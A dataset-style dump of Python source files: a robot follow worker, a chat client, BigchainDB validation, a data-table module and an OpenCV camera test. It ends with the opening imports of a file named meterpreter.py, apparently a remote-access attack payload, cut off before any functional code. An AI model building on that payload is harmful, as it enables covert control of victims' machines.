source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
worker3.py
|
from cerebral import logger as l
import logging
import Pyro4
from ares.main import Ares
from cerebral.nameserver import lookup, ports
from cerebral.pack1.hippocampus import Android
from threading import RLock, Thread, Event
import time
# Configure pyro.
Pyro4.config.SERIALIZERS_ACCEPTED = frozenset(['pickle', 'serpent'])
Pyro4.config.SERIALIZER = 'pickle'
super_agility = Pyro4.Proxy(lookup('worker1', 'super_agility'))
agility = Pyro4.Proxy(lookup('worker1', 'agility'))
super_theia = Pyro4.Proxy(lookup('worker2', 'super_theia'))
class SuperAres:
def __init__(self):
self.ares = Ares(Android.robot, Android.camera, Android.info)
self.thread = None
self.lock = RLock()
self.event = Event()
def start_follow(self):
with self.lock:
if self.thread is None:
self.thread = Thread(target=self._follow)
self.thread.start()
return True
return False
def stop(self):
with self.lock:
super_agility.stop()
super_theia.stop()
if self.thread is not None:
self.event.set()
self.thread.join()
self.thread = None
self.event.clear()
return True
def _follow(self):
# Stop robot, zero, and center head.
super_agility.stop()
super_agility.set_vector((0, 0))
agility.center_head()
if self.event.is_set():
return
# Find thing to follow.
blob = super_theia.find()
if blob is None:
return
# Get target information.
target_area = blob[2] * blob[3]
# Begin gait watcher.
super_agility.start_watch()
# Main loop.
lost_counter = 0
while not self.event.is_set():
found, bb, center = super_theia.get_status()
if found:
lost_counter = 0
# Target is good. First, get current data.
hr = agility.head_rotation()
area = bb[2] * bb[3]
x = center[0]
# Set head. This is more important than moving.
head_data = agility.look_at(center[0], center[1])
agility.move_head(head_data)
# Compute and set the direction vector.
vector = self.ares.compute_vector(target_area, area, x, hr)
super_agility.set_vector(vector)
else:
lost_counter += 1
if lost_counter > 10:
# A lot of lost frames. Target is probably out of head range. Center head, rotate body.
agility.center_head()
super_agility.set_vector((0, 0.15))
elif center is not None:
# Might have temporarily gone out of view. Scan head, auto velocity control.
agility.look_at(center[0], center[1])
agility.scan(0)
# Rest a bit. You don't need to go super super fast.
# Like, human response time is around 200 ms.
time.sleep(0.05)
super_ares = SuperAres()
if __name__ == '__main__':
# Create a daemon.
port = ports['worker3']
daemon = Pyro4.Daemon('localhost', port)
# Register all objects.
daemon.register(super_ares, 'super_ares')
# Start event loop.
daemon.requestLoop()
|
client.py
|
import socket
import threading
flag = 0
s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
hostname = input("Enter your host :: ")
s.connect((hostname , 1023))
nickname = input("Enter your Name :: ")
def recieve():
while True:
try:
msg = s.recv(1024).decode("utf-8")
if msg == 'NICK':
print("Welcome to Chat room :: " , nickname)
s.send(bytes(nickname , "utf-8"))
else:
print(msg)
except:
print("An Erro occured ")
s.close()
flag = 1
break
def Write():
while True:
try:
reply_msg = f"{nickname} :: {input()}"
s.send(bytes(reply_msg , "utf-8"))
except:
print("An Error Occured while sending message !!!")
s.close()
flag = 1
break
if flag == 1:
exit()
recieve_thrd = threading.Thread(target=recieve)
recieve_thrd.start()
write_thrd = threading.Thread(target=Write)
write_thrd.start()
|
parallel_validation.py
|
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0
import multiprocessing as mp
from collections import defaultdict
from bigchaindb import App, BigchainDB
from bigchaindb.tendermint_utils import decode_transaction
from abci import CodeTypeOk
class ParallelValidationApp(App):
def __init__(self, bigchaindb=None, events_queue=None, abci=None):
super().__init__(bigchaindb, events_queue, abci=abci)
self.parallel_validator = ParallelValidator()
self.parallel_validator.start()
def check_tx(self, raw_transaction):
return self.abci.ResponseCheckTx(code=CodeTypeOk)
def deliver_tx(self, raw_transaction):
self.parallel_validator.validate(raw_transaction)
return self.abci.ResponseDeliverTx(code=CodeTypeOk)
def end_block(self, request_end_block):
result = self.parallel_validator.result(timeout=30)
for transaction in result:
if transaction:
self.block_txn_ids.append(transaction.id)
self.block_transactions.append(transaction)
return super().end_block(request_end_block)
RESET = 'reset'
EXIT = 'exit'
class ParallelValidator:
def __init__(self, number_of_workers=mp.cpu_count()):
self.number_of_workers = number_of_workers
self.transaction_index = 0
self.routing_queues = [mp.Queue() for _ in range(self.number_of_workers)]
self.workers = []
self.results_queue = mp.Queue()
def start(self):
for routing_queue in self.routing_queues:
worker = ValidationWorker(routing_queue, self.results_queue)
process = mp.Process(target=worker.run)
process.start()
self.workers.append(process)
def stop(self):
for routing_queue in self.routing_queues:
routing_queue.put(EXIT)
def validate(self, raw_transaction):
dict_transaction = decode_transaction(raw_transaction)
index = int(dict_transaction['id'], 16) % self.number_of_workers
self.routing_queues[index].put((self.transaction_index, dict_transaction))
self.transaction_index += 1
def result(self, timeout=None):
result_buffer = [None] * self.transaction_index
for _ in range(self.transaction_index):
index, transaction = self.results_queue.get(timeout=timeout)
result_buffer[index] = transaction
self.transaction_index = 0
for routing_queue in self.routing_queues:
routing_queue.put(RESET)
return result_buffer
class ValidationWorker:
"""Run validation logic in a loop. This Worker is suitable for a Process
life: no thrills, just a queue to get some values, and a queue to return results.
Note that a worker is expected to validate multiple transactions in
multiple rounds, and it needs to keep in memory all transactions already
validated, until a new round starts. To trigger a new round of validation,
a ValidationWorker expects a `RESET` message. To exit the infinite loop the
worker is in, it expects an `EXIT` message.
"""
def __init__(self, in_queue, results_queue):
self.in_queue = in_queue
self.results_queue = results_queue
self.bigchaindb = BigchainDB()
self.reset()
def reset(self):
# We need a place to store already validated transactions,
# in case of dependant transactions in the same block.
# `validated_transactions` maps an `asset_id` with the list
# of all other transactions sharing the same asset.
self.validated_transactions = defaultdict(list)
def validate(self, dict_transaction):
try:
asset_id = dict_transaction['asset']['id']
except KeyError:
asset_id = dict_transaction['id']
transaction = self.bigchaindb.is_valid_transaction(
dict_transaction,
self.validated_transactions[asset_id])
if transaction:
self.validated_transactions[asset_id].append(transaction)
return transaction
def run(self):
while True:
message = self.in_queue.get()
if message == RESET:
self.reset()
elif message == EXIT:
return
else:
index, transaction = message
self.results_queue.put((index, self.validate(transaction)))
|
data_table.py
|
# Copyright 2017 James P Goodwin data table package to manage sparse columnar data
""" module that implement a data table package to manage sparse columnar data window and refresh them automatically """
import sys
import os
from datetime import datetime
from dateutil import parser
import threading
import time
import csv
import json
from functools import wraps
string_type = '_string'
float_type = '_float'
int_type = '_int'
date_type = '_date'
blank_type = '_blank'
def format_string( s ):
return str(s)
def format_date( d ):
return d.strftime("%m/%d/%y %H:%M")
def format_float( d ):
if d >= 1000 and d < 1000000:
return "%.0fK"%(d/1000)
elif d >= 1000000 and d < 1000000000:
return "%.0fM"%(d/1000000)
elif d >= 1000000000:
return "%.0fG"%(d/1000000000)
else:
return "%.2f"%d
def format_int( d ):
if d >= 1000 and d < 1000000:
return "%dK"%(d//1000)
elif d >= 1000000 and d < 1000000000:
return "%dM"%(d//1000000)
elif d >= 1000000000:
return "%dG"%(d//1000000000)
else:
return "%d"%d
class Cell(object):
def __init__(self,type,value,format):
self.type = type
self.value = value
self.format = format
def __str__(self):
return self.format(self.value)
def get_type(self):
return self.type
def get_value(self):
return self.value
def put_value(self,value):
self.value = value
def get_float_value(self):
if self.type in [float_type,int_type]:
return float(self.value)
elif self.type == date_type:
return self.value.timestamp()
else:
return 0.0
def get_format(self):
return self.format
def set_format(self,format):
self.format = format
blank_cell = Cell(blank_type,"",lambda x: "")
class ColumnIterator(object):
def __init__(self,column):
self.column = column
self.idx = 0
self.limit = column.size()
def __iter__(self):
return self
def __next__(self):
if self.idx >= self.limit:
raise StopIteration
ret = self.column.get(self.idx)
self.idx += 1
return ret
class Column(object):
def __init__(self,values=None,idx=0,name=None,table=None):
""" accept a list of Cell objects, a column index, and a column name, and a table to be a part of """
self.values = values if values else []
self.idx = 0
self.name = name
self.table = table
def size(self):
""" get the size of this column """
return len(self.values)
def delete(self,idx):
if idx < len(self.values):
del self.values[idx]
def ins(self,idx,value):
if idx <= len(self.values):
self.values.insert(idx,value)
else:
self.put(idx,value)
def get(self,idx):
""" get the cell at index idx in column """
if idx < len(self.values):
return self.values[idx]
else:
return blank_cell
def put(self,idx,value):
""" put a Cell value at index idx in column """
if idx < len(self.values):
self.values[idx] = value
return
if idx == len(self.values):
self.values.append(value)
return
elif idx > len(self.values):
while idx >= len(self.values):
self.values.append(blank_cell)
self.values[idx] = value
return
def get_name(self):
return self.name
def set_name(self,name):
self.name = name
def get_idx(self):
return self.idx
def set_idx(self,idx):
self.idx = idx
def get_table(self):
return self.table
def set_table(self,table):
self.table = table
blank_column = Column()
def synchronized(method):
@wraps(method)
def wrapper(self, *args, **kwargs):
with self.refresh_lock:
return method(self, *args, **kwargs)
return wrapper
# format of data table as json
# {
# "name" : name of the table,
# "refresh_minutes" : refresh interval in minutes,
# "columns" : [ array of column structures
# {
# "name": column name
# "values" : [ array of cells in column
# {
# "type" : one of "_string","_float","_int","_date","_blank"
# "value" : string, float, int, float for date, or "" for blank
# },
# ]
# },
# ]
# }
def from_json( stream ):
""" load a DataTable from a stream as JSON, return new DataTable """
jtable = json.load(stream)
dt = DataTable(None,jtable.get("name","JSON DataTable"),jtable.get("refresh_minutes",1))
for c in jtable["columns"]:
nc = Column( name = c.get("name", None) )
for v in c["values"]:
ct = v["type"]
cv = v["value"]
if ct == string_type:
cc = Cell(string_type,cv,format_string)
elif ct == float_type:
cc = Cell(float_type,cv,format_float)
elif ct == int_type:
cc = Cell(int_type,cv,format_float)
elif ct == date_type:
cc = Cell(date_type,datetime.fromtimestamp(cv),format_date)
elif ct == blank_type:
cc = blank_cell
nc.put(nc.size(),cc)
dt.add_column( nc )
return dt
def to_json( dt, stream ):
""" write a DataTable to a stream as JSON """
out_dict = {}
if dt.name:
out_dict["name"] = dt.name
out_dict["refresh_minutes"] = dt.refresh_minutes
columns = []
for idx in range(len(dt.columns)):
dtc = dt.columns[idx]
column = {}
if dtc.name:
column["name"] = dtc.name
values = []
for dtv in dtc.values:
values.append( { "type":dtv.type, "value": ( dtv.value if dtv.type != date_type else dtv.get_float_value() ) } )
column["values"] = values
columns.append(column)
out_dict["columns"] = columns
json.dump(out_dict,stream)
# csv representation of a DataTable
# heading row at the top
# each column of the form: table name_column name_type names cannot contain '_" and
# types will be used to load cells can't have mixed cell types in a column
def from_csv( stream, name=None, field_map=None ):
""" load a DataTable from a stream as CSV, return new DataTable, you can provide an override to the default parsing to provide a name and a field_map which is a list of tuples CSV_column_name,DataTable_column_name,DataTable_type it will only load columns in the column map """
dt = None
dr = csv.DictReader(stream)
for drr in dr:
for drc in drr:
parts = drc.split("_",2)
if not dt:
if name:
dt = DataTable(name=name)
elif not field_map and len(parts) == 3:
dt = DataTable(name=parts[0])
else:
dt = DataTable()
dtc = None
dtt = None
if field_map:
for fm in field_map:
if drc == fm[0]:
dtc = fm[1]
dtt = fm[2]
break
else:
if len(parts) == 3:
dtc = parts[1]
dtt = "_"+parts[2]
if dtc and dtt:
if not dt.has_column(dtc):
dt.add_column(Column(name=dtc))
dtcc = dt.get_column(dtc)
drv = drr[drc]
if drv and dtt == string_type:
cc = Cell(string_type,drv,format_string)
elif drv and dtt == float_type:
cc = Cell(float_type,float(drv),format_float)
elif drv and dtt == int_type:
cc = Cell(int_type,int(drv),format_float)
elif drv and dtt == date_type:
try:
cc = Cell(date_type,datetime.fromtimestamp(float(drv)),format_date)
except:
cc = Cell(date_type,parser.parse(drv),format_date)
elif not drv or dtt == blank_type:
cc = blank_cell
dtcc.put(dtcc.size(),cc)
return dt
def to_csv( dt, stream ):
""" write a DataTable to a stream as CSV, see standard format in comments above, type for column is based on the zeroth cell """
field_names = []
idx = 0
max_idx = 0
for c in dt.columns:
type = blank_type
for tidx in range(c.size()):
if c.get(tidx).type != blank_type:
type = c.get(tidx).type
break
field_names.append((dt.name if dt.name else "DataTable")+"_"+(c.name if c.name else "Column %d"%idx)+type)
idx += 1
if c.size() > max_idx:
max_idx = c.size()
wcsv = csv.DictWriter(stream,field_names)
for wcridx in range(max_idx):
wcr = {}
for idx in range(len(dt.columns)):
cell = dt.columns[idx].get(wcridx)
wcr[field_names[idx]] = (cell.get_value() if cell.type != date_type else cell.get_float_value())
if wcridx == 0:
wcsv.writeheader()
wcsv.writerow(wcr)
class DataTable(object):
def __init__(self,columns=None,name=None,refresh_minutes=10):
""" accepts a list of columns and a name for the table """
self.listeners = []
self.columns = []
self.name = name
self.cnames = {}
self.refresh_lock = threading.RLock()
self.refresh_minutes = refresh_minutes
self.refresh_thread = None
self.refresh_thread_stop = False
self.refresh_timestamp = None
if columns:
for c in columns:
self.add_column(c)
def get_refresh_timestamp( self ):
""" get the time that the table was last refreshed """
return self.refresh_timestamp
def acquire_refresh_lock(self):
""" acquire the refresh lock before reading/writing the table state """
self.refresh_lock.acquire()
def release_refresh_lock(self):
""" release the refresh lock after reading/writing the table state """
self.refresh_lock.release()
def start_refresh( self ):
""" Start the background refresh thread """
self.stop_refresh()
self.refresh_thread = threading.Thread(target=self.perform_refresh)
self.refresh_thread.start()
def perform_refresh( self ):
""" Thread worker that sleeps and refreshes the data on a schedule """
start_time = time.time()
while not self.refresh_thread_stop:
if time.time() - start_time >= self.refresh_minutes*60.0:
self.refresh()
start_time = time.time()
time.sleep(1)
def stop_refresh( self ):
""" Stop the background refresh thread """
self.refresh_thread_stop = True
if self.refresh_thread and self.refresh_thread.is_alive():
self.refresh_thread.join()
self.refresh_thread = None
self.refresh_thread_stop = False
def listen(self,listen_func):
""" register for notifications when a change event is raised on this table """
self.listeners.append(listen_func)
def unlisten(self,listen_func):
""" unregister for notifications when a change event is raised on this table """
self.listeners.remove(listen_func)
def changed(self):
""" notify listeners that this table has been changed """
for f in self.listeners:
f(self)
@synchronized
def get_bounds(self):
""" return a tuple (rows,cols) where rows is the maximum number of rows and cols is the maximum number of cols """
cols = len(self.columns)
rows = -1
for c in self.columns:
size = c.size()
if rows < 0 or size > rows:
rows = size
return (rows,cols)
def get_name(self):
""" return the name of the table """
return self.name
@synchronized
def get_names(self):
""" return a list of the names of the columns in order"""
return [c.get_name() for c in self.columns]
@synchronized
def get_columns(self):
""" return the list of columns """
return self.columns
@synchronized
def add_column(self,column):
idx = len(self.columns)
column.set_idx(idx)
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
self.columns.append(column)
self.cnames[column.get_name()] = column
column.set_table(self)
@synchronized
def insert_column(self,idx,column):
while idx > len(self.columns):
self.add_column(blank_column)
if idx == len(self.columns):
self.add_column(column)
else:
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
self.columns.insert(idx,column)
self.cnames[column.get_name()] = column
column.set_table(self)
while idx < len(self.columns):
if column.get_name() == "%s_%d"%(self.name,idx-1):
column.set_name("%s_%d"%(self.name,idx))
self.cnames[column.get_name()] = column
self.columns[idx].set_idx(idx)
idx += 1
@synchronized
def replace_column(self,idx,column):
column.set_idx(idx)
if not column.get_name():
column.set_name("%s_%d"%(self.name,idx))
if idx == len(self.columns):
self.columns.append(column)
else:
del self.cnames[self.columns[idx].get_name()]
self.columns[idx] = column
self.cnames[column.get_name()] = column
column.set_table(self)
@synchronized
def map_column(self, reference ):
if type(reference) == str or type(reference) == str:
return self.cnames[reference].get_idx()
elif type(reference) == int:
return reference
else:
raise TypeError("wrong type in mapping")
@synchronized
def has_column(self, reference ):
if type(reference) == str or type(reference) == str:
return reference in self.cnames
elif type(reference) == int:
return idx < len(self.columns)
else:
return False
@synchronized
def get_column(self, reference):
return self.columns[self.map_column(reference)]
@synchronized
def get(self, row, reference ):
return self.columns[self.map_column(reference)].get(row)
@synchronized
def put(self, row, reference, value):
self.columns[self.map_column(reference)].put(row,value)
@synchronized
def refresh(self):
""" base class method for forcing a refresh on a table """
self.refresh_timestamp = time.time()
|
testM3.py
|
#!/usr/bin/python
import os
import sys
import numpy as np
import cv2
import time
import threading
from multiprocessing import Process, Queue, Pipe, Manager, Lock
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
print(cv2.__version__)
class fpsWithTick(object):
def __init__(self):
self._count = 0
self._oldCount = 0
self._freq = 1000 / cv2.getTickFrequency()
self._startTime = cv2.getTickCount()
def get(self):
nowTime = cv2.getTickCount()
diffTime = (nowTime - self._startTime) * self._freq
self._startTime = nowTime
fps = (self._count - self._oldCount) / (diffTime / 1000.0)
self._oldCount = self._count
self._count += 1
fpsRounded = round(fps, 2)
return fpsRounded
def view_thresh(cn_r,cn_s):
print("thresh init")
proc_width = 480
proc_height = 270
view_width = 240
view_height = 135
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
print("thresh start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("thresh None")
break
#print("thresh run")
image2_img = image.copy()
#image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#image2_chan = cv2.split(image2_hsv)
#image2_chan[2] = cv2.equalizeHist(image2_chan[2])
#image2_hsv = cv2.merge(image2_chan)
#image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
gray = cv2.cvtColor(image2_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.resize(gray, (proc_width, proc_height))
proc_gray = cv2.equalizeHist(proc_gray)
proc_thresh = cv2.blur(proc_gray, (5,5), 0)
_, proc_thresh = cv2.threshold(proc_thresh, 112, 255, cv2.THRESH_BINARY)
proc_thresh = cv2.bitwise_not(proc_thresh)
proc_mask = cv2.cvtColor(proc_thresh, cv2.COLOR_GRAY2RGB)
proc_img = cv2.resize(image2_img, (proc_width, proc_height))
proc_img = cv2.bitwise_and(proc_img, proc_mask)
cnts0 = cv2.findContours(proc_thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]
cnts0.sort(key=cv2.contourArea, reverse=True)
cnts1 = [cnt for cnt in cnts0 if cv2.contourArea(cnt) > 500]
for i, c in enumerate(cnts1):
cv2.drawContours(proc_img, [c], -1, (255, 0, 0), 2)
al = cv2.arcLength(c, True) * 0.01
c2 = cv2.approxPolyDP(c, al, True)
cv2.drawContours(proc_img, [c2], -1, (0, 255, 0), 2)
arc_area = cv2.contourArea(c2)
x,y,w,h = cv2.boundingRect(c2)
hit_area = w * h
if (arc_area/hit_area) > 0.8:
cv2.rectangle(proc_img, (x,y), (x+w,y+h), (0,0,255), 2)
view_img = cv2.resize(proc_img, (view_width, view_height))
cv2.putText(view_img, "THRESH", (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
cn_s.put( view_img.copy() )
thresh = cv2.resize(proc_img, (480, 270))
cn_s.put( thresh.copy() )
time.sleep(0.1)
print("thresh end")
def view_canny(cn_r,cn_s):
print("canny init")
proc_width = 480
proc_height = 270
view_width = 240
view_height = 135
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
print("canny start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("canny None")
break
#print("canny run")
image2_img = image.copy()
#image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
#image2_chan = cv2.split(image2_hsv)
#image2_chan[2] = cv2.equalizeHist(image2_chan[2])
#image2_hsv = cv2.merge(image2_chan)
#image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
gray = cv2.cvtColor(image2_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.resize(gray, (proc_width, proc_height))
proc_gray = cv2.equalizeHist(proc_gray)
proc_gray = cv2.blur(proc_gray, (5,5), 0)
#_, proc_thresh = cv2.threshold(proc_gray, 128, 255, cv2.THRESH_BINARY)
#proc_thresh = cv2.bitwise_not(proc_thresh)
#proc_canny = cv2.Canny(proc_thresh, threshold1=80, threshold2=110)
proc_canny = cv2.Canny(proc_gray, threshold1=80, threshold2=110)
proc_over = cv2.cvtColor(proc_canny, cv2.COLOR_GRAY2BGR)
proc_img = cv2.resize(image2_img,(proc_width, proc_height))
proc_img = cv2.bitwise_or(proc_img, proc_over)
lines = cv2.HoughLines(proc_canny, 1.1, np.pi/180, 150)
if lines is not None:
for rho,theta in lines[0]:
a=np.cos(theta)
b=np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 1000 * (-b))
y1 = int(y0 + 1000 * (a))
x2 = int(x0 - 1000 * (-b))
y2 = int(y0 - 1000 * (a))
cv2.line(proc_img, (x1, y1), (x2, y2), (255,0,0), 1)
lines = cv2.HoughLinesP(proc_canny, 3, np.pi/180, 10, 50, 50)
if lines is not None:
for (x1, y1, x2, y2) in lines[0]:
cv2.line(proc_img, (x1, y1), (x2, y2), (0,255,0), 2)
circles = cv2.HoughCircles(proc_canny, cv2.cv.CV_HOUGH_GRADIENT, dp=1.5, minDist=80, minRadius=10, maxRadius=80)
if circles is not None:
circles = np.uint16(np.around(circles))
for (x, y, r) in circles[0,:]:
cv2.circle(proc_img, (x, y), r, (0,0,255), 2)
view_img = cv2.resize(proc_img, (view_width, view_height))
cv2.putText(view_img, "CANNY", (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
cn_s.put( view_img.copy() )
canny = cv2.resize(proc_img, (480, 270))
cn_s.put( canny.copy() )
time.sleep(0.1)
print("canny end")
def view_procD(cn_r,cn_s):
print("procD init")
proc_width = 320
proc_height = 180
view_width = 480
view_height = 270
hit_width = 240
hit_height = 240
blue_img = np.zeros((135,240,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(240,135),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
casname = cn_r.get()
cascade = cv2.CascadeClassifier(casname)
haar_scale = 1.1
min_neighbors = 2
min_size = (10, 10)
print("procD start")
fps_class = fpsWithTick()
while True:
if not cn_r.empty():
image = cn_r.get()
if image is None:
print("procD None")
break
#print("procD run")
image2_height, image2_width = image.shape[:2]
image2_hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
image2_chan = cv2.split(image2_hsv)
image2_chan[2] = cv2.equalizeHist(image2_chan[2])
image2_hsv = cv2.merge(image2_chan)
image2_img = cv2.cvtColor(image2_hsv, cv2.COLOR_HSV2BGR)
proc_img = cv2.resize(image2_img,(proc_width, proc_height))
proc_gray = cv2.cvtColor(proc_img, cv2.COLOR_BGR2GRAY)
proc_gray = cv2.equalizeHist(proc_gray)
view_img = cv2.resize(image2_img,(view_width, view_height))
rects = cascade.detectMultiScale(proc_gray, scaleFactor=haar_scale, minNeighbors=min_neighbors, minSize=min_size)
if rects is not None:
for (hit_x, hit_y, hit_w, hit_h) in rects:
x = int(hit_x * image2_width / proc_width)
y = int(hit_y * image2_height / proc_height)
w = int(hit_w * image2_width / proc_width)
h = int(hit_h * image2_height / proc_height)
hit_img = cv2.resize(image2_img[y:y+h, x:x+w],(hit_width,hit_height))
cn_s.put( hit_img.copy() )
lx = int(hit_x * view_width / proc_width)
ly = int(hit_y * view_height / proc_height)
lw = int(hit_w * view_width / proc_width)
lh = int(hit_h * view_height / proc_height)
lxw = lx + lw
lyh = ly + lh
cv2.rectangle(view_img, (lx,ly), (lxw,lyh), (0,0,255), 2)
cv2.putText(view_img, casname, (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
str_fps = str(fps_class.get())
cv2.putText(view_img, str_fps, (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 2, (0,0,255))
cn_s.put( view_img.copy() )
time.sleep(0.1)
print("procD end")
if __name__ == '__main__':
print("main init")
dev = "0"
cas = "face.xml"
if len(sys.argv)==2 and sys.argv[1].isdigit():
dev = sys.argv[1]
elif len(sys.argv)==2:
cas = sys.argv[1]
elif len(sys.argv)==3 and sys.argv[2].isdigit():
cas = sys.argv[1]
dev = sys.argv[2]
elif len(sys.argv)==3 and sys.argv[1].isdigit():
cas = sys.argv[2]
dev = sys.argv[1]
elif len(sys.argv)==3:
cas = sys.argv[1]
dev = sys.argv[2]
live_width = 240
live_height = 135
image_width = 480
image_height = 270
blue_img = np.zeros((live_height,live_width,3), np.uint8)
cv2.rectangle(blue_img,(0,0),(live_width,live_height),(255,0,0),cv2.cv.CV_FILLED)
cv2.putText(blue_img, "No Data !", (40,80), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
image_img = cv2.resize(blue_img, (image_width, image_height))
image_thresh = image_img.copy()
image_canny = image_img.copy()
cv2.namedWindow("Live", 1)
cv2.imshow( "Live", blue_img)
cv2.moveWindow( "Live", 0, 25)
cv2.namedWindow("Thresh", 1)
cv2.imshow( "Thresh", blue_img)
cv2.moveWindow( "Thresh", 240, 25)
cv2.namedWindow("Canny", 1)
cv2.imshow( "Canny", blue_img)
cv2.moveWindow( "Canny", 480, 25)
cv2.namedWindow("Detect", 1)
cv2.imshow( "Detect", image_img)
cv2.moveWindow( "Detect", 0, 200)
cv2.namedWindow("Hit", 1)
cv2.imshow( "Hit", blue_img)
cv2.moveWindow( "Hit", 480, 200)
capture = None
if dev.isdigit():
capture = cv2.VideoCapture(int(dev))
capture.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 640)
capture.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 480)
capture.set(cv2.cv.CV_CAP_PROP_FPS, 15)
else:
capture = cv2.VideoCapture(dev)
print("main start")
thresh_proc = None
canny_proc = None
procD_proc = None
fps_class = fpsWithTick()
while True:
ret, frame = capture.read()
if not ret:
cv2.imshow("Live", blue_img )
print("capture error")
time.sleep(10.0)
break
else:
#print("main run")
frame_height, frame_width = frame.shape[:2]
frame_height2 = frame_width * image_height / image_width
if frame_height2 == frame_height:
image_img = cv2.resize(frame, (image_width, image_height))
else:
h=(frame_height-frame_height2) / 2
image_img = cv2.resize(frame[h:h+frame_height2, 0:frame_width], (image_width, image_height))
live_img = cv2.resize(image_img, (live_width, live_height))
str_src = str(frame_width) + "x" + str(frame_height)
str_fps = str(fps_class.get())
cv2.putText(live_img, str_src, (40,30), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (255,0,255))
cv2.putText(live_img, str_fps, (40,45), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0,0,255))
#cv2.imshow("Live", live_img)
if thresh_proc is None:
thresh_s = Queue()
thresh_r = Queue()
thresh_proc = threading.Thread(target=view_thresh, args=(thresh_s,thresh_r,))
thresh_proc.daemon = True
thresh_beat = time.time()
thresh_s.put( image_img.copy() )
thresh_proc.start()
if thresh_r.empty():
cv2.line(live_img, (0, 1), (0+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (0, 1), (0+79, 1), (255,0,0), 3)
thresh_beat = time.time()
img = thresh_r.get()
cv2.imshow("Thresh", img )
image_thresh = thresh_r.get()
thresh_s.put( image_img.copy() )
if (time.time() - thresh_beat) > 10:
print("thresh 10s")
break
if canny_proc is None:
canny_s = Queue()
canny_r = Queue()
canny_proc = threading.Thread(target=view_canny, args=(canny_s,canny_r,))
canny_proc.daemon = True
canny_beat = time.time()
canny_s.put( image_img.copy() )
canny_proc.start()
if canny_r.empty():
cv2.line(live_img, (80, 1), (80+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (80, 1), (80+79, 1), (255,0,0), 3)
canny_beat = time.time()
img = canny_r.get()
cv2.imshow("Canny", img )
image_canny = canny_r.get()
canny_s.put( image_img.copy() )
if (time.time() - canny_beat) > 10:
print("canny 10s")
break
if procD_proc is None:
procD_s = Queue()
procD_r = Queue()
procD_proc = threading.Thread(target=view_procD, args=(procD_s,procD_r,))
procD_proc.daemon = True
procD_beat = time.time()
procD_s.put(cas)
procD_s.put( image_img.copy() )
procD_proc.start()
if procD_r.empty():
cv2.line(live_img, (160, 1), (160+79, 1), (0,0,255), 3)
else:
cv2.line(live_img, (160, 1), (160+79, 1), (255,0,0), 3)
procD_beat = time.time()
while not procD_r.empty():
img = procD_r.get()
img_h, img_w = img.shape[:2]
if img_w != 480:
cv2.imshow("Hit", img )
else:
cv2.imshow("Detect", img )
procD_s.put( image_img.copy() )
if (time.time() - procD_beat) > 10:
print("procD 10s")
break
cv2.imshow("Live", live_img )
if cv2.waitKey(10) >= 0:
break
time.sleep(0.01)
print("main terminate")
if thresh_proc is not None:
thresh_s.put(None)
canny_s.put(None)
procD_s.put(None)
time.sleep(3)
thresh_s.close()
thresh_r.close()
canny_s.close()
canny_r.close()
procD_s.close()
procD_r.close()
capture.release()
cv2.destroyAllWindows()
print("main Bye!")
|
meterpreter.py
|
#!/usr/bin/python
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
try:
urllib_imports = ['ProxyBasicAuthHandler', 'ProxyHandler', 'HTTPSHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
